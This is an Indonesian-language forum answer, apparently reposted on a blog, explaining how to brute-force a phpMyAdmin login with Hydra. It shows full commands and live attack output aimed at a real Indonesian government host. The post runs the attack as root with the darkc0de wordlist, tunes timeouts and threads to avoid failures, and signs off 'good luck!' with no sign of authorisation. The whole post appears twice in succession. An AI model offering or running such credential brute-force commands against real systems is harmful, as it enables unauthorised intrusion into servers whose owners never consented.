Quote:Original Posted By linuxeruciha ►
sebelmnya mhn maaf jika ada kata-kata yang salah...
gan ane mau tanya kira-kira kalau tools di backtrack untuk brute password phpmyadmin ada ?????
phpmyadmin auth ref : http://wiki.phpmyadmin.net/pma/Auth_types
Quote:auth_type http also prompts for a MySQL username and password, but does so using HTTP Basic authentication. The look of the prompt is determined by the browser; most pop up a login window.
kita pake hydra aja deh.
contoh :
untuk awal pasti begini, timeout
Quote:root@root:~# hydra -l root -P /pentest/passwords/wordlists/darkc0de.lst air.bappenas.go.id http-head /phpmyadmin/
Hydra v6.5 (c) 2011 by van Hauser / THC and David Maciejak - use allowed only for legal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2011-09-16 07:10:48
[DATA] 16 tasks, 1 servers, 1707656 login tries (l:1/p:1707656), ~106728 tries per task
[DATA] attacking service http-head on port 80
Warning: Timeout from child 0, restarting
Warning: Timeout from child 1, restarting
Warning: Timeout from child 2, restarting
Warning: Timeout from child 3, restarting
Warning: Timeout from child 4, restarting
Warning: Timeout from child 5, restarting
Warning: Timeout from child 6, restarting
Warning: Timeout from child 7, restarting
Warning: Timeout from child 8, restarting
Warning: Timeout from child 9, restarting
Warning: Timeout from child 10, restarting
Warning: Timeout from child 11, restarting
Warning: Timeout from child 12, restarting
Warning: Timeout from child 13, restarting
Warning: Timeout from child 14, restarting
Warning: Timeout from child 15, restarting
kita naikin timeout time nya jadi 50 (default : 20), lalu turunin thread nya jadi 10 (default : 16)
Quote:root@root:~# hydra -l root -P /pentest/passwords/wordlists/darkc0de.lst air.bappenas.go.id http-head /phpmyadmin/ -t 10 -w 50
Hydra v6.5 (c) 2011 by van Hauser / THC and David Maciejak - use allowed only for legal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2011-09-16 06:56:16
[DATA] 10 tasks, 1 servers, 1707656 login tries (l:1/p:1707656), ~170765 tries per task
[DATA] attacking service http-get on port 80
[STATUS] 1447.00 tries/min, 1447 tries in 00:01h, 1706209 todo in 19:40h
[STATUS] 1442.33 tries/min, 4327 tries in 00:03h, 1703329 todo in 19:41h
ini contoh nambahin Verbose
Quote:root@root:~# hydra -l root -P /pentest/passwords/wordlists/darkc0de.lst air.bappenas.go.id http-head /phpmyadmin/ -t 10 -w 50 -V
Hydra v6.5 (c) 2011 by van Hauser / THC and David Maciejak - use allowed only for legal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2011-09-16 07:05:24
[DATA] 10 tasks, 1 servers, 1707656 login tries (l:1/p:1707656), ~170765 tries per task
[DATA] attacking service http-head on port 80
[ATTEMPT] target air.bappenas.go.id - login "root" - pass "" - child 0 - 1 of 1707656
[ATTEMPT] target air.bappenas.go.id - login "root" - pass " - child 1 - 2 of 1707656
[ATTEMPT] target air.bappenas.go.id - login "root" - pass " - child 2 - 3 of 1707656
[ATTEMPT] target air.bappenas.go.id - login "root" - pass " - child 3 - 4 of 1707656
[ATTEMPT] target air.bappenas.go.id - login "root" - pass " - child 4 - 5 of 1707656
[ATTEMPT] target air.bappenas.go.id - login "root" - pass " - child 5 - 6 of 1707656
[ATTEMPT] target air.bappenas.go.id - login "root" - pass " - child 6 - 7 of 1707656
[ATTEMPT] target air.bappenas.go.id - login "root" - pass " - child 7 - 8 of 1707656
[ATTEMPT] target air.bappenas.go.id - login "root" - pass " - child 8 - 9 of 1707656
[ATTEMPT] target air.bappenas.go.id - login "root" - pass " " - child 9 - 10 of 1707656
[ATTEMPT] target air.bappenas.go.id - login "root" - pass "!magnus" - child 0 - 11 of 1707656
[ATTEMPT] target air.bappenas.go.id - login "root" - pass "!power" - child 9 - 12 of 1707656
[ATTEMPT] target air.bappenas.go.id - login "root" - pass ""A" SIDES" - child 3 - 13 of 1707656
[ATTEMPT] target air.bappenas.go.id - login "root" - pass ""DETROIT" GARY & CC TH WIGGINS" - child 0 - 14 of 1707656
-------8<---------snip
[ATTEMPT] target air.bappenas.go.id - login "root" - pass "# List of common male names." - child 1 - 56 of 1707656
good luck!
sebelmnya mhn maaf jika ada kata-kata yang salah...
gan ane mau tanya kira-kira kalau tools di backtrack untuk brute password phpmyadmin ada ?????
phpmyadmin auth ref : http://wiki.phpmyadmin.net/pma/Auth_types
Quote:auth_type http also prompts for a MySQL username and password, but does so using HTTP Basic authentication. The look of the prompt is determined by the browser; most pop up a login window.
kita pake hydra aja deh.
contoh :
untuk awal pasti begini, timeout
Quote:root@root:~# hydra -l root -P /pentest/passwords/wordlists/darkc0de.lst air.bappenas.go.id http-head /phpmyadmin/
Hydra v6.5 (c) 2011 by van Hauser / THC and David Maciejak - use allowed only for legal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2011-09-16 07:10:48
[DATA] 16 tasks, 1 servers, 1707656 login tries (l:1/p:1707656), ~106728 tries per task
[DATA] attacking service http-head on port 80
Warning: Timeout from child 0, restarting
Warning: Timeout from child 1, restarting
Warning: Timeout from child 2, restarting
Warning: Timeout from child 3, restarting
Warning: Timeout from child 4, restarting
Warning: Timeout from child 5, restarting
Warning: Timeout from child 6, restarting
Warning: Timeout from child 7, restarting
Warning: Timeout from child 8, restarting
Warning: Timeout from child 9, restarting
Warning: Timeout from child 10, restarting
Warning: Timeout from child 11, restarting
Warning: Timeout from child 12, restarting
Warning: Timeout from child 13, restarting
Warning: Timeout from child 14, restarting
Warning: Timeout from child 15, restarting
kita naikin timeout time nya jadi 50 (default : 20), lalu turunin thread nya jadi 10 (default : 16)
Quote:root@root:~# hydra -l root -P /pentest/passwords/wordlists/darkc0de.lst air.bappenas.go.id http-head /phpmyadmin/ -t 10 -w 50
Hydra v6.5 (c) 2011 by van Hauser / THC and David Maciejak - use allowed only for legal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2011-09-16 06:56:16
[DATA] 10 tasks, 1 servers, 1707656 login tries (l:1/p:1707656), ~170765 tries per task
[DATA] attacking service http-get on port 80
[STATUS] 1447.00 tries/min, 1447 tries in 00:01h, 1706209 todo in 19:40h
[STATUS] 1442.33 tries/min, 4327 tries in 00:03h, 1703329 todo in 19:41h
ini contoh nambahin Verbose
Quote:root@root:~# hydra -l root -P /pentest/passwords/wordlists/darkc0de.lst air.bappenas.go.id http-head /phpmyadmin/ -t 10 -w 50 -V
Hydra v6.5 (c) 2011 by van Hauser / THC and David Maciejak - use allowed only for legal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2011-09-16 07:05:24
[DATA] 10 tasks, 1 servers, 1707656 login tries (l:1/p:1707656), ~170765 tries per task
[DATA] attacking service http-head on port 80
[ATTEMPT] target air.bappenas.go.id - login "root" - pass "" - child 0 - 1 of 1707656
[ATTEMPT] target air.bappenas.go.id - login "root" - pass " - child 1 - 2 of 1707656
[ATTEMPT] target air.bappenas.go.id - login "root" - pass " - child 2 - 3 of 1707656
[ATTEMPT] target air.bappenas.go.id - login "root" - pass " - child 3 - 4 of 1707656
[ATTEMPT] target air.bappenas.go.id - login "root" - pass " - child 4 - 5 of 1707656
[ATTEMPT] target air.bappenas.go.id - login "root" - pass " - child 5 - 6 of 1707656
[ATTEMPT] target air.bappenas.go.id - login "root" - pass " - child 6 - 7 of 1707656
[ATTEMPT] target air.bappenas.go.id - login "root" - pass " - child 7 - 8 of 1707656
[ATTEMPT] target air.bappenas.go.id - login "root" - pass " - child 8 - 9 of 1707656
[ATTEMPT] target air.bappenas.go.id - login "root" - pass " " - child 9 - 10 of 1707656
[ATTEMPT] target air.bappenas.go.id - login "root" - pass "!magnus" - child 0 - 11 of 1707656
[ATTEMPT] target air.bappenas.go.id - login "root" - pass "!power" - child 9 - 12 of 1707656
[ATTEMPT] target air.bappenas.go.id - login "root" - pass ""A" SIDES" - child 3 - 13 of 1707656
[ATTEMPT] target air.bappenas.go.id - login "root" - pass ""DETROIT" GARY & CC TH WIGGINS" - child 0 - 14 of 1707656
-------8<---------snip
[ATTEMPT] target air.bappenas.go.id - login "root" - pass "# List of common male names." - child 1 - 56 of 1707656
good luck!
Tidak ada komentar:
Posting Komentar